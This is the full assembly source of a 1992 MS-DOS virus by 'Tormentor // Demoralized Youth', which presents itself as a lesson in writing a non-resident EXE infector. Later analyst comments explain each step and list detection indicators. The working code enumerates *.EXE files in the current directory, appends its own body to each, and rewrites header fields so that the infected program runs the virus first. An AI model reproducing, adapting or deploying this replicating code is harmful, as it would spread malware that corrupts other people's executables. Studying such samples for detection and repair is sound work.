MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.torm-358.asm
2021-01-12 18:01:59 -06:00


;
; Virus Lession #2 'How to make a non-resident EXE infector'
;
; (c) 1992 Tormentor // Demoralized Youth
;
; Well, I had not time to comment this code as much as I wanted to,
; but here you are.
; What can be hard to understand is the .EXE header changes, but if
; you look at the description on the header (ex: Norton guide Tech. Ref)
; you'll understand...
; Anyway, feel free to use this example and if you have any questions
; or anything call my board: Swedish Virus Labratory +46-3191-9393
;
; Greetings to all virus-writers!
;
; /Tormentor
;
; Assembler setup. The directives and operand syntax used in this file
; (.model, .radix, "offset", "byte ptr", DUP) are MASM/TASM-style, even though
; the hosting page tags the file as NASM.
.model tiny
; From here on every bare numeric literal is hexadecimal: "10" is 16 decimal,
; "200" is 512 decimal, "16" is header offset 16h, and so on. Keep this in mind
; when reading the EXE-header offsets further down.
.radix 16
.code
; Number of bytes between Virus_Start and Virus_End. This is the amount the
; write call appends to a target file, so it is also the size by which an
; infected file grows.
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
; 100h: this first-generation build is laid out as a .COM image, which DOS
; loads at offset 100h behind the PSP.
org 100
; Entry point of the appended code (all literals are hex, per .radix 16).
; What this run does, in order:
;   1. Uses a call/pop pair to learn its own runtime address; afterwards
;      SI = runtime offset of Virus_Start, and every data reference below is
;      formed as SI + (label - Virus_Start).
;   2. Pushes the host program's original entry point (segment, then offset)
;      so that the final RETF transfers control to the host.
;   3. Saves the caller's DS, sets DS = CS, and points the DOS DTA at Own_dta.
; Analyst note: "call" immediately followed by "pop" of the return address is
; a common marker of self-relocating appended code in DOS binaries.
Virus_Start: call where_we_are
where_we_are: pop si
sub si,where_we_are-Virus_Start
; ES holds the PSP segment at program entry; +10h paragraphs skips the
; 100h-byte PSP and yields the segment where the program image starts.
mov ax,es
add ax,10
; Header offset 16h = initial CS (relative to the load segment) saved from the
; host's original header; offset 14h = initial IP. In this first-generation
; build the saved values are the placeholders defined at Exe_header.
add ax,cs:[si+Exe_header-Virus_Start+16]
push ax
push cs:[si+Exe_header-Virus_Start+14]
; Caller's DS is kept on the stack and restored just before the RETF.
push ds
push cs
pop ds
; INT 21h / AH=1Ah: set Disk Transfer Address to DS:DX (= Own_dta at runtime),
; so the find-first/find-next results land inside this code's own buffer.
mov ah,1a
mov dx,offset Own_dta-Virus_Start
add dx,si
int 21
; File search loop head (literals are hex, per .radix 16).
; AH is 4Eh (find first) on the first pass and 4Fh (find next) when control
; comes back here from Sick_or_EXE. The pattern at file_match carries no drive
; or path, so DOS resolves it against the current directory.
; Analyst note: the observable behaviour is a directory enumeration of *.EXE
; followed by a read/write open of each match.
mov ah,4e ; We start to look for a *.EXE file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
; Carry clear = a matching directory entry was written to the DTA.
jnc cont2
jmp no_victim_found ; If no *.EXE files was found.
; INT 21h / AX=3D02h: open existing file, access mode 02 = read/write.
; DX = DTA + 1Eh, the offset of the ASCIIZ file name in a find-first record.
cont2: mov ax,3d02
mov dx,Own_dta-Virus_Start+1e
add dx,si
int 21
; Carry clear = open succeeded and AX holds the file handle.
jnc cont1
jmp cant_open_file
; Header check and file modification (literals are hex, per .radix 16).
; Sequence visible in this run:
;   - read the first 1Ch bytes of the opened file into Exe_header
;   - skip the file unless its first byte is 'M', or if header offset 12h
;     already holds the marker word 'DY'
;   - append Virus_Lenght bytes (this code plus its data) at end of file
;   - rewrite header fields 02h, 04h, 12h, 14h and 16h and write the header back
; Analyst notes for detection and clean-up:
;   - The only header fields written are 02h/04h (image size), 12h (checksum
;     slot, used as the marker) and 14h/16h (entry point). No other header
;     field is stored to in this code.
;   - The body is appended BEFORE the header buffer is modified, so the copy
;     of Exe_header inside the appended bytes still holds the host's original
;     first 1Ch header bytes. A repair tool can take the original values for
;     offsets 02h, 04h, 12h, 14h and 16h from there and truncate the file by
;     Virus_Lenght bytes.
;   - The marker is the two-character constant 'DY'; its byte order on disk
;     depends on how the assembler encodes multi-character constants, so
;     confirm against a sample before writing a signature on it.
cont1: xchg ax,bx
; BX = file handle for all following INT 21h calls.
; INT 21h / AH=3Fh: read CX=1Ch bytes (the fixed part of an EXE header).
mov ah,3f
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc read_error
; Only the first signature byte is compared; the second byte is not checked.
cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
jnz no_exe ; !!! Some EXEs starts with ZM !!!
; Offset 12h is the header checksum slot; here it doubles as the
; "already processed" marker.
cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
jz infected
; INT 21h / AX=4202h with CX:DX = 0: seek to end of file.
; Returns the file length in DX:AX.
mov ax,4202 ; Go EOF
xor cx,cx
xor dx,dx
int 21
; Original file length is kept on the stack for the entry-point calculation.
push dx
push ax
; INT 21h / AH=40h: write CX bytes from DS:DX. DX = SI = runtime address of
; Virus_Start, so the whole range Virus_Start..Virus_End is appended,
; including the text at "notes" and the current contents of Exe_header
; and Own_Dta.
mov ah,40 ; Write virus to EOF.
mov cx,Virus_Lenght
mov dx,si
int 21
; Seek to end again to obtain the new length in DX:AX.
mov ax,4202 ; Get NEW filelenght.
xor cx,cx
xor dx,dx
int 21
; Divide the new length by 200h (512-byte pages): AX = quotient, DX = remainder.
; The quotient is incremented, then the remainder goes to header offset 02h
; (bytes in last page) and the page count to offset 04h.
mov cx,200
div cx
inc ax
mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
; Recover the original length (DX:AX) and divide by 10h to express the old
; end of file as paragraphs (AX) plus a byte remainder (DX).
pop ax
pop dx
mov cx,10
div cx
; Offset 08h = header size in paragraphs; subtracting it converts a file
; position into a segment relative to the start of the load image.
sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
; New initial CS (16h) and IP (14h) now point at the appended bytes.
mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
; Stamp the marker tested above into the checksum slot.
mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
; INT 21h / AX=4200h with CX:DX = 0: seek to start of file.
mov ax,4200 ; Position file-pointer to begin of file
xor cx,cx
xor dx,dx
int 21
; Overwrite the first 1Ch bytes of the file with the modified header.
mov ah,40 ; Write header
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc write_error
; Per-file clean-up and loop continuation (literals are hex, per .radix 16).
; Reached by fall-through after the header write, or by jump when the file was
; skipped (first byte not 'M', or marker already present).
no_exe:
infected:
; INT 21h / AH=3Eh: close the handle in BX.
mov ah,3e
int 21
; AH=4Fh (find next) is loaded here and the INT 21h itself is issued at
; look4victim, so the loop continues with the next *.EXE match.
Sick_or_EXE: mov ah,4f
jmp look4victim
; Common exit. All four labels below mark the same address, so every error
; path and the "no more files" path leave in the same way.
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
; Restore the DS saved at entry, then far-return to the segment:offset pushed
; at entry, i.e. the host program's original entry point. No instruction
; between Virus_Start and this RETF does anything other than search, read,
; append and rewrite headers.
pop ds
retf
; Data area (literals are hex, per .radix 16). Everything from here up to
; Virus_End lies inside the Virus_Start..Virus_End range, so all of it is
; present in the bytes appended to a modified file.
; Analyst note: the search pattern and the two text strings below are stored
; as plain text and are therefore usable as static indicators when scanning
; DOS executables.
file_match db '*.EXE',0 ; Pattern to search for.
; Don't forget to end with 0 !
; 1Ch-byte buffer for the target's EXE header: 16h zero bytes (offsets
; 00h-15h), one word at offset 16h, four more zero bytes (18h-1Bh).
Exe_header db 16 DUP(0)
; Placeholder for the saved initial CS in this first-generation build. The
; entry code adds it to (PSP segment + 10h); with 0FFF0h the 16-bit sum wraps
; back to the PSP segment, and the saved IP placeholder is 0, so the final
; RETF lands at PSP:0000.
dw 0fff0 ; Adjustment just for this COM-file.
db 4 DUP(0)
; Author banner. No instruction in this file references the "notes" label;
; the text is only embedded, not displayed. 0a,0d follow the first line and
; the second line has no terminator.
notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
db 'Rather first in hell, than second in heaven.'
; 2Bh (43) bytes: private DTA that receives find-first/find-next records.
; The matched file name is read from offset 1Eh of this buffer.
Own_Dta db 02bh DUP(0)
; End marker used to compute Virus_Lenght.
Virus_End EQU $
; Program entry point for the assembled first-generation image.
end Virus_Start